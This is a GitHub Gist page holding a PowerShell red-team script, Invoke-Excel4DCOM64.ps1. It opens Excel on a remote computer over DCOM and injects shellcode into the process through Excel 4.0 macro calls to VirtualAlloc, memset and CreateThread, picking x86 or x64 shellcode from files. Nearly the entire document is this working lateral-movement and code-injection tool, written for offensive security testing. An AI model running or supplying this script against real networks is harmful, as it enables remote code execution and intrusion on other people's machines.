-
-
Save joeleonjr/eb33cb6a5a6f65f404cebb75985cbc49 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#********************************************************************** | |
# Invoke-Excel4DCOM64.ps1 | |
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support | |
# Author: Stan Hegt (@StanHacked) / Outflank, | |
# x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason, | |
# Excel version detection by Joe Leon (@JoeLeonJr) / FortyNorth Security | |
# Date: 2019/04/21 | |
# Version: 1.1 | |
#********************************************************************** | |
function Invoke-Excel4DCOM | |
{ | |
<# | |
.SYNOPSIS | |
Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM. | |
.DESCRIPTION | |
Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. | |
Use a Powershell version with the same bitness as the Office version when running locally. | |
This script automatically parses the Excel version (x86 vs x64) and sends the appropriate shellcode. | |
.PARAMETER Computername | |
Specify a remote host to inject into. | |
.PARAMETER Payload86 | |
Specify a file containing the x86 shellcode. | |
.PARAMETER Payload64 | |
Specify a file containing the x64 shellcode. | |
.EXAMPLE | |
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin | |
Inject payload into excel.exe on server01. | |
.LINK | |
http://www.outflank.nl | |
.NOTES | |
Outflank - stan@outflank.nl | |
#> | |
[CmdletBinding()] Param( | |
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)] | |
[Alias("PSComputerName","MachineName","IP","IPAddress","Host")] | |
[String] | |
$ComputerName, | |
[Parameter(Position = 1, Mandatory = $true)] | |
[Alias("Shellcode86","x86", "86")] | |
[String] | |
$Payload86, | |
[Parameter(Position = 2, Mandatory = $true)] | |
[Alias("Shellcode64", "x64", "64")] | |
[String] | |
$Payload64 | |
) | |
# Create an instance of the Excel.Application COM object | |
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) | |
if ($excel.path -like "*x86*") { | |
$lpAddress = 0 | |
$sc = get-content -Encoding Byte $Payload86 | |
} | |
else { | |
# If we are using 64bit Excel, try to allocate a low address | |
$lpAddress = 1342177280 | |
$sc = get-content -Encoding Byte $Payload64 | |
} | |
# Address allocation | |
$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)') | |
$count = 0 | |
# Write the payload byte by byte to oure allocated buffer | |
foreach ($byte in $sc) { | |
$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)') | |
$count = $count + 1 | |
Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100) | |
} | |
# Shellcode Time! | |
$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)') | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment